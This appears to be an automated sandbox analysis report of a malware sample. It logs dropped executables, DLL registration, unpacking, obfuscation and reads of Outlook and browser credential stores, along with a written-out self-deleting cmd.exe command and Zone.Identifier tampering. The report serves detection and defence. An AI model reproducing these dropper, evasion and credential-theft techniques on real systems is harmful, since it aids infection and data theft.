Source: file.exe Virustotal: Detection: 36%
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe
Source: unknown Process created: C:\Users\user\AppData\Roaming\uucbfdt C:\Users\user\AppData\Roaming\uucbfdt
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\37F1.exe C:\Users\user\AppData\Local\Temp\37F1.exe
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\405E.exe C:\Users\user\AppData\Local\Temp\405E.exe
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\45DE.exe C:\Users\user\AppData\Local\Temp\45DE.exe
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\49F6.exe C:\Users\user\AppData\Local\Temp\49F6.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\regsvr32.exe regsvr32 /s C:\Users\user\AppData\Local\Temp\509E.dll
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe /s C:\Users\user\AppData\Local\Temp\509E.dll
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\5487.exe C:\Users\user\AppData\Local\Temp\5487.exe
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\5999.exe C:\Users\user\AppData\Local\Temp\5999.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe
Source: C:\Users\user\AppData\Local\Temp\5999.exe Process created: C:\Users\user\AppData\Local\Temp\5999.exe C:\Users\user\AppData\Local\Temp\5999.exe
Source: C:\Users\user\AppData\Local\Temp\49F6.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1324 -s 520
Source: C:\Users\user\AppData\Local\Temp\45DE.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5516 -s 520
Source: unknown Process created: C:\Users\user\AppData\Roaming\gecbfdt C:\Users\user\AppData\Roaming\gecbfdt
Source: C:\Users\user\AppData\Local\Temp\5487.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout /t 6 & del /f /q "C:\Users\user\AppData\Local\Temp\5487.exe" & exit
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 6
Source: C:\Users\user\AppData\Roaming\gecbfdt Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1100 -s 520
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\37F1.exe C:\Users\user\AppData\Local\Temp\37F1.exe Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\405E.exe C:\Users\user\AppData\Local\Temp\405E.exe Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\45DE.exe C:\Users\user\AppData\Local\Temp\45DE.exe Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\49F6.exe C:\Users\user\AppData\Local\Temp\49F6.exe Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\regsvr32.exe regsvr32 /s C:\Users\user\AppData\Local\Temp\509E.dll Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\5487.exe C:\Users\user\AppData\Local\Temp\5487.exe Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\5999.exe C:\Users\user\AppData\Local\Temp\5999.exe Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe /s C:\Users\user\AppData\Local\Temp\509E.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5487.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout /t 6 & del /f /q "C:\Users\user\AppData\Local\Temp\5487.exe" & exit Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5999.exe Process created: C:\Users\user\AppData\Local\Temp\5999.exe C:\Users\user\AppData\Local\Temp\5999.exe Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 6
Source: C:\Windows\explorer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32 Jump to behavior
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\37F1.tmp Jump to behavior
Source: 5487.exe, 00000012.00000002.530162506.0000000061EB7000.00000002.00000001.01000000.00000013.sdmp, sqlite3.dll.18.dr Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: 5487.exe, 00000012.00000002.530162506.0000000061EB7000.00000002.00000001.01000000.00000013.sdmp, sqlite3.dll.18.dr Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: 5487.exe, 00000012.00000002.530162506.0000000061EB7000.00000002.00000001.01000000.00000013.sdmp, sqlite3.dll.18.dr Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: 5487.exe, 00000012.00000002.530162506.0000000061EB7000.00000002.00000001.01000000.00000013.sdmp, sqlite3.dll.18.dr Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: 5487.exe, 00000012.00000002.530162506.0000000061EB7000.00000002.00000001.01000000.00000013.sdmp, sqlite3.dll.18.dr Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: 5487.exe, 00000012.00000002.530162506.0000000061EB7000.00000002.00000001.01000000.00000013.sdmp, sqlite3.dll.18.dr Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: 5487.exe, 00000012.00000002.530162506.0000000061EB7000.00000002.00000001.01000000.00000013.sdmp, sqlite3.dll.18.dr Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: 1C1E.tmp.20.dr, 28782868176069075816534615.18.dr Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: 5487.exe, 00000012.00000002.530162506.0000000061EB7000.00000002.00000001.01000000.00000013.sdmp, sqlite3.dll.18.dr Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: 5487.exe, 00000012.00000002.530162506.0000000061EB7000.00000002.00000001.01000000.00000013.sdmp, sqlite3.dll.18.dr Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: C:\Users\user\AppData\Local\Temp\37F1.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_008DCECB CreateToolhelp32Snapshot,Module32First, 0_2_008DCECB
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5936:120:WilError_01
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5516
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess1100
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess1324
Source: C:\Users\user\Desktop\file.exe Command line argument: ppA 0_2_00416FC0
Source: C:\Users\user\AppData\Roaming\uucbfdt Command line argument: ppA 11_2_00416FC0
Source: C:\Users\user\AppData\Local\Temp\37F1.exe Command line argument: 08A 12_2_00413780
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\explorer.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\explorer.exe Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Windows\explorer.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5487.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5487.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5999.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\5999.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\WerFault.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\WerFault.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\WerFault.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\WerFault.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\explorer.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Windows\SysWOW64\msvcr100.dll Jump to behavior
Source: file.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: C:\Windows\System.ServiceModel.pdbpdbdel.pdb source: 37F1.exe, 0000000C.00000002.541669029.0000000002EA1000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\weba\kika.pdb source: 405E.exe, 0000000D.00000000.394848625.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, gecbfdt, 0000001E.00000000.484717133.0000000000401000.00000020.00000001.01000000.00000014.sdmp, 405E.exe.1.dr, gecbfdt.1.dr
Source: Binary string: C:\nefih\xugo.pdb source: 5999.exe, 00000013.00000000.409927020.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, 5999.exe, 00000013.00000002.470817394.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, 5999.exe, 00000019.00000000.431212305.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, 5999.exe.1.dr
Source: Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb source: 5999.exe, 00000013.00000002.474602203.0000000002370000.00000040.00001000.00020000.00000000.sdmp, 5999.exe, 00000019.00000000.458476037.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 5999.exe, 00000019.00000002.480385928.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 5999.exe, 00000019.00000000.456775427.0000000000400000.00000040.00000400.00020000.00000000.sdmp
Source: Binary string: C:\hegehi\20\gilecozosixebu gazirule82-kekec.pdb source: file.exe, uucbfdt.1.dr
Source: Binary string: \??\C:\Windows\dll\System.ServiceModel.pdb source: 37F1.exe, 0000000C.00000002.541669029.0000000002EA1000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: QDC:\gabotolupajavi\yakorod\pucomenazis.pdb source: 49F6.exe, 0000000F.00000000.399892526.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, 49F6.exe.1.dr
Source: Binary string: nHC:\Windows\System.ServiceModel.pdb source: 37F1.exe, 0000000C.00000002.530857284.0000000000196000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: C:\gix\modabohuva lopehojeha9-kotisotinago\kayuhoki.pdb source: 45DE.exe, 0000000E.00000000.397590247.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, 45DE.exe.1.dr
Source: Binary string: \??\C:\Windows\symbols\dll\System.ServiceModel.pdbR source: 37F1.exe, 0000000C.00000002.541669029.0000000002EA1000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: _.pdb source: 37F1.exe, 0000000C.00000002.549799190.0000000005F55000.00000004.00000800.00020000.00000000.sdmp, 37F1.exe, 0000000C.00000002.545785192.0000000004B70000.00000004.08000000.00040000.00000000.sdmp, 37F1.exe, 0000000C.00000002.544624082.0000000004A4A000.00000004.00000800.00020000.00000000.sdmp, 37F1.exe, 0000000C.00000003.430586809.0000000002EF0000.00000004.00000020.00020000.00000000.sdmp, 37F1.exe, 0000000C.00000003.426623227.0000000002EB9000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\gix\modabohuva lopehojeha9-kotisotinago\kayuhoki.pdbx source: 45DE.exe, 0000000E.00000000.397590247.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, 45DE.exe.1.dr
Source: Binary string: 1C:\lahikuvobive\puhob.pdbp source: 5487.exe, 00000012.00000000.405253268.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, 5487.exe.1.dr
Source: Binary string: C:\gihiyunawajova-92\licirif_zezada\88 lefe.pdb source: 37F1.exe, 0000000C.00000000.391310999.0000000000401000.00000020.00000001.01000000.00000009.sdmp, 37F1.exe.1.dr
Source: Binary string: System.ServiceModel.pdbH source: 37F1.exe, 0000000C.00000002.542633343.0000000002F1C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: FC:\weba\kika.pdb source: 405E.exe, 0000000D.00000000.394848625.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, gecbfdt, 0000001E.00000000.484717133.0000000000401000.00000020.00000001.01000000.00000014.sdmp, 405E.exe.1.dr, gecbfdt.1.dr
Source: Binary string: System.ServiceModel.pdb source: 37F1.exe, 0000000C.00000002.542633343.0000000002F1C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\lahikuvobive\puhob.pdb source: 5487.exe, 00000012.00000000.405253268.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, 5487.exe.1.dr
Source: Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdbI source: 5999.exe, 00000013.00000002.474602203.0000000002370000.00000040.00001000.00020000.00000000.sdmp, 5999.exe, 00000019.00000000.458476037.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 5999.exe, 00000019.00000002.480385928.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 5999.exe, 00000019.00000000.456775427.0000000000400000.00000040.00000400.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.pdb source: 37F1.exe, 0000000C.00000002.541669029.0000000002EA1000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\gabotolupajavi\yakorod\pucomenazis.pdb source: 49F6.exe, 0000000F.00000000.399892526.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, 49F6.exe.1.dr
Source: Binary string: System.ServiceModel.pdbK source: 37F1.exe, 0000000C.00000002.552906667.0000000008132000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: ^5C:\nefih\xugo.pdb source: 5999.exe, 00000013.00000000.409927020.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, 5999.exe, 00000013.00000002.470817394.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, 5999.exe, 00000019.00000000.431212305.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, 5999.exe.1.dr

Data Obfuscation
barindex
Detected unpacking (overwrites its own PE header)
Source: C:\Users\user\AppData\Local\Temp\37F1.exe Unpacked PE file: 12.2.37F1.exe.400000.0.unpack
Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\file.exe Unpacked PE file: 0.2.file.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:EW;
Source: C:\Users\user\AppData\Roaming\uucbfdt Unpacked PE file: 11.2.uucbfdt.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:EW;
Source: C:\Users\user\AppData\Local\Temp\37F1.exe Unpacked PE file: 12.2.37F1.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
Source: C:\Users\user\AppData\Local\Temp\405E.exe Unpacked PE file: 13.2.405E.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:EW;
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040A4A3 push ecx; ret 0_2_0040A4B6
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040EF9D push ecx; ret 0_2_0040EFB0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00701890 push cs; retf 0_2_0070189C
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_008DE0D4 push cs; retf 0_2_008DE0FF
Source: C:\Users\user\AppData\Roaming\uucbfdt Code function: 11_2_0040A4A3 push ecx; ret 11_2_0040A4B6
Source: C:\Users\user\AppData\Roaming\uucbfdt Code function: 11_2_0040EF9D push ecx; ret 11_2_0040EFB0
Source: C:\Users\user\AppData\Local\Temp\37F1.exe Code function: 12_2_0041C40C push cs; iretd 12_2_0041C4E2
Source: C:\Users\user\AppData\Local\Temp\37F1.exe Code function: 12_2_00423149 push eax; ret 12_2_00423179
Source: C:\Users\user\AppData\Local\Temp\37F1.exe Code function: 12_2_0041C50E push cs; iretd 12_2_0041C4E2
Source: C:\Users\user\AppData\Local\Temp\37F1.exe Code function: 12_2_004231C8 push eax; ret 12_2_00423179
Source: C:\Users\user\AppData\Local\Temp\37F1.exe Code function: 12_2_0040E21D push ecx; ret 12_2_0040E230
Source: C:\Users\user\AppData\Local\Temp\37F1.exe Code function: 12_2_0041C6BE push ebx; ret 12_2_0041C6BF
Source: C:\Users\user\AppData\Local\Temp\37F1.exe Code function: 12_2_048DE484 push ecx; ret 12_2_048DE497
Source: C:\Users\user\AppData\Local\Temp\37F1.exe Code function: 12_2_048EBE73 push cs; iretd 12_2_048EBF49
Source: C:\Users\user\AppData\Local\Temp\37F1.exe Code function: 12_2_048EBF75 push cs; iretd 12_2_048EBF49
Source: C:\Users\user\AppData\Local\Temp\37F1.exe Code function: 12_2_048EC125 push ebx; ret 12_2_048EC126
Contains functionality to dynamically determine API calls
Source: C:\Users\user\AppData\Local\Temp\37F1.exe Code function: 12_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear, 12_2_004019F0
Registers a DLL
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\regsvr32.exe regsvr32 /s C:\Users\user\AppData\Local\Temp\509E.dll
PE file contains sections with non-standard names
Source: sqlite3.dll.18.dr Static PE information: section name: /4
Source: sqlite3.dll.18.dr Static PE information: section name: /19
Source: sqlite3.dll.18.dr Static PE information: section name: /31
Source: sqlite3.dll.18.dr Static PE information: section name: /45
Source: sqlite3.dll.18.dr Static PE information: section name: /57
Source: sqlite3.dll.18.dr Static PE information: section name: /70
Source: sqlite3.dll.18.dr Static PE information: section name: /81
Source: sqlite3.dll.18.dr Static PE information: section name: /92
Drops PE files to the application program directory (C:\ProgramData)
Source: C:\Users\user\AppData\Local\Temp\5487.exe File created: C:\ProgramData\sqlite3.dll Jump to dropped file
Drops files with a non-matching file extension (content does not match file extension)
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Roaming\gecbfdt Jump to dropped file
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Roaming\uucbfdt Jump to dropped file
Drops PE files
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Roaming\uucbfdt Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\5487.exe File created: C:\ProgramData\sqlite3.dll Jump to dropped file
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\37F1.exe Jump to dropped file
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\5999.exe Jump to dropped file
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\509E.dll Jump to dropped file
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\405E.exe Jump to dropped file
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\5487.exe Jump to dropped file
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Roaming\gecbfdt Jump to dropped file
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\45DE.exe Jump to dropped file
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\49F6.exe Jump to dropped file

Hooking and other Techniques for Hiding and Protection
barindex
Deletes itself after installation
Source: C:\Windows\explorer.exe File deleted: c:\users\user\desktop\file.exe Jump to behavior
Hides that the sample has been downloaded from the Internet (zone.identifier)
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Roaming\uucbfdt:Zone.Identifier read attributes | delete Jump to behavior
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Roaming\gecbfdt:Zone.Identifier read attributes | delete Jump to behavior
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Users\user\AppData\Local\Temp\5487.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\37F1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\37F1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\37F1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\37F1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\37F1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\37F1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\37F1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\37F1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\37F1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\37F1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\37F1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\37F1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\37F1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\37F1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\37F1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\37F1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\37F1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\37F1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\37F1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\37F1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\37F1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\37F1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\37F1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\37F1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\37F1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\37F1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\37F1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\37F1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\37F1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\37F1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\37F1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\37F1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\37F1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\37F1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\37F1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\37F1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\37F1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\37F1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\37F1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\37F1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\37F1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\37F1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\37F1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\37F1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\37F1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\37F1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\37F1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\37F1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5487.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5999.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\5999.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\5999.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\5999.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
